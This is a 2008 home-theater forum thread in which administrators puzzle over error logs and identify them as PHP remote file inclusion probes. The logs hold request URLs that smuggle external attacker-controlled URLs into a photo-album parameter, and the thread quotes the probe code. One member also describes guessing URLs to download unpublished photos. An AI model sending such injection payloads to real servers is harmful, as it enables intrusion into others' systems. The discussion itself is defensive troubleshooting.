Return to the CurtPalme.com main site CurtPalme.com Home Theater Forum
A forum with a sense of fun and community for Home Theater enthusiasts!
Products for Sale ] [ FAQ: Hooking it all up ] [ CRT Primer/FAQ ] [ Best/Worst CRT Projectors List ] [ Setup Tips & Manuals ] [ Advanced Procedures ] [ Newsletters ]

 
Forum FAQForum FAQ   SearchSearch   MemberlistMemberlist  Photo AlbumsPhoto Albums  RegisterRegister 
 MembershipClub Membership   ProfileProfile   Private MessagesPrivate Messages   Log inLog in 
Blu-ray disc release list and must-have titles. Buy the latest and best Blu-ray titles to show off in your home theater!

We're being spammed and I can't figure out ...

 
Post new topic   Reply to topic   Printer-friendly view    CurtPalme.com Forum Index -> Forum Feedback
View previous topic :: View next topic  
Author Message
kal
Forum Administrator



Joined: 06 Mar 2006
Posts: 17850
Location: Ottawa, Canada

TV/Projector: JVC DLA-NZ7


PostLink    Posted: Mon Mar 03, 2008 10:13 pm    Post subject: We're being spammed and I can't figure out ... Reply with quote


        Register to remove this ad. It's free!
A free Club Membership to anyone that helps me figure this out! Smile

Whenever the forum throws an error, I get emailed. Helps me keep on top of problems.

For some time now however, I've been getting emails like this:

Code:

General Error Message:

The photo does not exist.


IP: 8.4.9.191
USER: Anonymous

URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&sid=f5c66f40f47522f6423f81281d79ac5a

FORM:
Array
(
)


The first part of the URL info (/forum/album_page.php?pic_id=) tells me that someone tried to view an image in our Photo Album but the second half is the spammy made up part that points to some SPAM site.

This happens every day. Random URLs.

So I'm:

(1) Not sure why someone's doing this (what's the point?)
(2) How they expect this to do something for them?

Kal

_________________

Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0


Last edited by kal on Mon Mar 03, 2008 10:15 pm; edited 1 time in total
Back to top
View user's photo album (18 photos)
kal
Forum Administrator



Joined: 06 Mar 2006
Posts: 17850
Location: Ottawa, Canada

TV/Projector: JVC DLA-NZ7


PostLink    Posted: Mon Mar 03, 2008 10:14 pm    Post subject: Reply with quote

Here are a few others in case anyone's curious:

Code:

General Error Message:

The photo does not exist.


IP: 8.4.9.191
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F&sid=f5c66f40f47522f6423f81281d79ac5a

FORM:
Array
(
)


Code:
General Error Message:

The photo does not exist.


IP: 216.239.91.165
USER: Anonymous

URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&sid=f9ced0c5f38072cad9e97c9c2ed4055f

FORM:
Array
(
)


Code:

General Error Message:

The photo does not exist.


IP: 216.239.91.165
USER: Anonymous

URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&sid=f9ced0c5f38072cad9e97c9c2ed4055f

FORM:
Array
(
)


Always the same thing, different URL.

Kal

_________________

Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Back to top
View user's photo album (18 photos)
ecrabb
Forum Moderator



Joined: 13 Mar 2006
Posts: 15909
Location: Utah

TV/Projector: JVC RS40, Epson 5010


PostLink    Posted: Mon Mar 03, 2008 11:23 pm    Post subject: Reply with quote

'&sid' is a session id - a unique identifier. When I turn the URL in the second error message above, back into a URL:
http://www.cjp.spb.ru/en/tis/leboma/&sid=f9ced0c5f38072cad9e97c9c2ed4055f

I get this error message:
Code:
<?php echo md5("just_a_test");?>


Same with the others. So, it makes a request to a PHP server. I'm guessing the link is databasing hits to track good email addresses to spam. As for why those URL's are ending up pointing to the forum's gallery, that I don't get. Server-side database stuff is way over my head, but I wonder if maybe there is some sort of security hole in phpBB they're exploiting (or trying to exploit)?

Seems like a mistake - maybe a spammers bad database server config...

Could you search/post in the phpBB user forum - those guys might actually know something there.

SC
Back to top
View user's photo album (10 photos)
kal
Forum Administrator



Joined: 06 Mar 2006
Posts: 17850
Location: Ottawa, Canada

TV/Projector: JVC DLA-NZ7


PostLink    Posted: Tue Mar 04, 2008 12:54 am    Post subject: Reply with quote

Interesting SC. I never followed this thing through but you're right.

That code you mentioned isn't an error message - it's just HTML with imbedded PHP code that the web server on their end isn't parsing through correctly first and therefore their web server just displays the entire code. If their PHP parser was 'on' the end result should be the the text "just_a_test" in your browser.

So I understand what's going but I still don't understand how the spammers are hoping to accomplish anything like you said. The photo album URL/feature they're using isn't in the base phpbb code. It's a popular addon mod.

Weird.

Thanks for the input/sleuthing though. I added an extra year to your club membership, just because. Smile You now expire on 2009/10/16 21:00:00 instead of 2008/10/16 21:00:00

Kal

_________________

Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Back to top
View user's photo album (18 photos)
kal
Forum Administrator



Joined: 06 Mar 2006
Posts: 17850
Location: Ottawa, Canada

TV/Projector: JVC DLA-NZ7


PostLink    Posted: Tue Mar 04, 2008 1:05 am    Post subject: Reply with quote

Ok, I've figured it out. I Googled the text <?php echo md5("just_a_test");?> and came up with a pile stuff.

Long story short: They're trying to use remote file inclusion within PHP to run stuff on my server.


http://web.dtbaker.com.au/post/catching_echo_md5_just_a_test_exploit_attempts

http://www.embedded.ch/http.htm

Kal

_________________

Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Back to top
View user's photo album (18 photos)
AnalogRocks
Forum Moderator



Joined: 08 Mar 2006
Posts: 26690
Location: Toronto, Ontario, Canada

TV/Projector: Sony 1252Q, AMPRO 4000G


PostLink    Posted: Tue Mar 04, 2008 1:55 am    Post subject: Reply with quote

kal wrote:
SC.
Smile You now expire on 2009/10/16 21:00:00 instead of 2008/10/16 21:00:00

Kal


Whew a repreeve. Make sure to get your afairs in order. Hell remember to have some afairs! Before you expire SC Wink

_________________
Tech support for nothing

CRT.

HD done right!
Back to top
View user's photo album (27 photos)
AnalogRocks
Forum Moderator



Joined: 08 Mar 2006
Posts: 26690
Location: Toronto, Ontario, Canada

TV/Projector: Sony 1252Q, AMPRO 4000G


PostLink    Posted: Tue Mar 04, 2008 1:56 am    Post subject: Reply with quote

Hey Kal, why not turn off the photo albums for a bit and see if those particular spammers/crackers go away aond get some cheese to go with them?
_________________
Tech support for nothing

CRT.

HD done right!
Back to top
View user's photo album (27 photos)
kal
Forum Administrator



Joined: 06 Mar 2006
Posts: 17850
Location: Ottawa, Canada

TV/Projector: JVC DLA-NZ7


PostLink    Posted: Tue Mar 04, 2008 3:33 am    Post subject: Reply with quote

That would mean that they'd have won. Nope. They can keep spamming away. There's no danger.

Kal

_________________

Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Back to top
View user's photo album (18 photos)
ecrabb
Forum Moderator



Joined: 13 Mar 2006
Posts: 15909
Location: Utah

TV/Projector: JVC RS40, Epson 5010


PostLink    Posted: Tue Mar 04, 2008 4:57 am    Post subject: Reply with quote

Geez, Kal - you didn't have to do that. I just like helping when I can - to give back a little to my favorite forum! This place is like my hangout - it's like the clubhouse, man! Thanks a lot, though!!!

OK, so bots are finding Apache PHP boxes running phpBB and trying that little bit of PHP code. If the vulnerability wasn't patched on the server, then that URL would actually work and ping that page with the bogus 'test' message and lodge an entry there. From there, the IP is now in a database and gets put on the list to attempt to install some other vulnerability on the server later... is that about right?

Man, the effort these guys go to!

SC
Back to top
View user's photo album (10 photos)
oliverg




Joined: 15 May 2007
Posts: 800
Location: Melbourne, Australia

TV/Projector: Sony G90 X2 - Vidikron Vision 1


PostLink    Posted: Tue Mar 04, 2008 12:34 pm    Post subject: Reply with quote

Most of the time, this type of activity is a bot looking for vulnerabilities.

Each server that is found to have holes gets logged and a database of vulnerable servers can be later used for nefarious purposes Wink

Its like being port scanned, mostly harmless. As long as you or your host keeps up to date with all the relevant patches

The same type of thing happens with PCs and spammers using zombies (infected pcs that hackers can exert a level of control over) for mass SMTP relaying.

_________________
( R ) G ( G ) 9 ( B ) 0 ( R ) G ( G ) 9 ( B ) 0
( R ) G ( G ) 9 ( B ) 0 ( R ) G ( G ) 9 ( B ) 0
Back to top
kal
Forum Administrator



Joined: 06 Mar 2006
Posts: 17850
Location: Ottawa, Canada

TV/Projector: JVC DLA-NZ7


PostLink    Posted: Tue Mar 04, 2008 4:45 pm    Post subject: Reply with quote

Exactly right SC. Though it's not just phpBB. They're just looking for any web server runnning PHP that may have the security hole exposed. If you do, the software/trojan gets installed on you and your site starts helping look for other victims. All of the URLs they're using in the links above are 'real' sites that just don't know they've been hacked.

Here's a list of infected sites: http://www.embedded.ch/http0.htm

Kal

_________________

Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Back to top
View user's photo album (18 photos)
kal
Forum Administrator



Joined: 06 Mar 2006
Posts: 17850
Location: Ottawa, Canada

TV/Projector: JVC DLA-NZ7


PostLink    Posted: Tue Mar 04, 2008 6:03 pm    Post subject: Reply with quote

Here's another (related?) error that we've been getting for years: Instead of a URL, there's a picture ID that's invalid.

Code:

General Error Message:

The photo does not exist.


IP: 66.249.72.174
USER: Anonymous
URL: /forum/album_page.php?pic_id=26

FORM:
Array
(
)


The pic_id value varies. This one I think is a valid error that someone here is generating, but I've never been able to trace it to the source...


Another value from the last 24 hours:

Code:


General Error Message:

The photo does not exist.


IP: 66.249.72.174
USER: Anonymous
URL: /forum/album_page.php?pic_id=189&mode=next

FORM:
Array
(
)


Kal

_________________

Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Back to top
View user's photo album (18 photos)
JustGreg




Joined: 07 Mar 2006
Posts: 3098
Location: Kenosha, WI


PostLink    Posted: Tue Mar 04, 2008 8:13 pm    Post subject: Reply with quote

If the IP listed is that of the suspect, the first one originated in New York Latitude: 40.7488 Longitude: -73.9846

Tracing route to host-8-4-9-191.onlinehorizons.net (8.4.9.191):
Hops ---Avg ms--------Address
1--------- 1 ------------ ****************
2 -------- * ----------- ****************
3 -------- 9 ----------- ************************************************
4 -------- 8 ----------- ************************************************
5 -------- 11 ----------- ************************************************
6 -------- 29 ----------- 24.94.160.33 (so0-0-3.kscymoL3-rtr1.kc.rr.com)
7 -------- 25 ----------- 4.79.132.13 (ge-5-1-203.hsa1.StLouis1.Level3.net)
8 -------- 25 ----------- 4.69.132.186 (ae-11-11.car2.StLouis1.Level3.net)
9 -------- 34 ----------- 4.69.132.190 (ae-4-4.ebr2.Chicago1.Level3.net)
10 ------- 25 ------------ 4.68.101.161 (ae-2-56.bbr2.Chicago1.Level3.net)
11 ------- 45 ------------ 64.159.0.81 (so-0-2-0.mp2.Stamford1.Level3.net)
12 ------- 46 ------------ 4.68.124.98 (so-11-0.hsa1.Stamford1.Level3.net)
13 ------- 46 ------------ 8.4.9.191 (host-8-4-9-191.onlinehorizons.net) New York State

All the asterisks were placed by me...it's the first hops from my PC at the beginning of my query. It wouldn't be very smart to post the route into my PC now would it. Laughing

The second IP is from Canada. Question Question

Nothing from Asia or Russia.



Greg

_________________
Greg

"Is it ignorance or apathy? Hey, I don't know and I don't care!" --Jimmy Buffett
Back to top
Malakay




Joined: 16 Mar 2006
Posts: 49
Location: Germany


PostLink    Posted: Wed Mar 05, 2008 10:45 pm    Post subject: Reply with quote

The pictures in your error message does not exist.

Try these:

http://www.curtpalme.com/forum/album_page.php?pic_id=26

Insert pic_id numbers at the end of the above line that dont exist and take a look if you get an error message.

I dont know why someone try to open pics that dont exist, maybe you can ask in the phpBB Forums if this can be used to hack the forum. Im not a hacker, i dont know Wink

/Edit: oh, and "&mode=next" only means that someone klicked on the next button on the picture, normal function Smile
Back to top
ecrabb
Forum Moderator



Joined: 13 Mar 2006
Posts: 15909
Location: Utah

TV/Projector: JVC RS40, Epson 5010


PostLink    Posted: Wed Mar 05, 2008 11:17 pm    Post subject: Reply with quote

Malakay wrote:
I dont know why someone try to open pics that dont exist, maybe you can ask in the phpBB Forums if this can be used to hack the forum.

That's exactly what Kal was asking. If links to browser pics are all from forum (database)-generated links, there should never be an issue with missing photos.

The only thing I could come up with is that somebody was manually editing the URL hoping to see another few pics that weren't visible in the gallery or something. I actually do that with websites when I see a cool photo associated with a story, and wonder if there are more. For instance, when autoblog covered the new Chevrolet Corvette ZR1, they had a whole bunch of photos from Chevrolet on their server, that weren't available publicly. I found and downloaded them just by changing the number on the end of some of the photos. Got lots of cool pics to download that I haven't seen anywhere else... and probably generated a whole slew of error msgs for the autoblog version of Kal in the process. Wink

SC
Back to top
View user's photo album (10 photos)
kal
Forum Administrator



Joined: 06 Mar 2006
Posts: 17850
Location: Ottawa, Canada

TV/Projector: JVC DLA-NZ7


PostLink    Posted: Thu Mar 06, 2008 1:06 am    Post subject: Reply with quote

ecrabb wrote:
Malakay wrote:
I dont know why someone try to open pics that dont exist, maybe you can ask in the phpBB Forums if this can be used to hack the forum.

That's exactly what Kal was asking. If links to browser pics are all from forum (database)-generated links, there should never be an issue with missing photos.

Yeah, that's exactly what I was getting at. No idea what code is generating these links that someone then clicks on. I can't figure it out myself.

Quote:
The only thing I could come up with is that somebody was manually editing the URL hoping to see another few pics that weren't visible in the gallery or something.

Don't think so... I've been getting 4-5 of these these every day more or less for a few years now. It just seems too consistent and the numbers are never sequential. They're almost random.

Kal

_________________

Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Back to top
View user's photo album (18 photos)
Display posts from previous:   
Post new topic   Reply to topic   Printer-friendly view    CurtPalme.com Forum Index -> Forum Feedback All times are GMT
Page 1 of 1
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum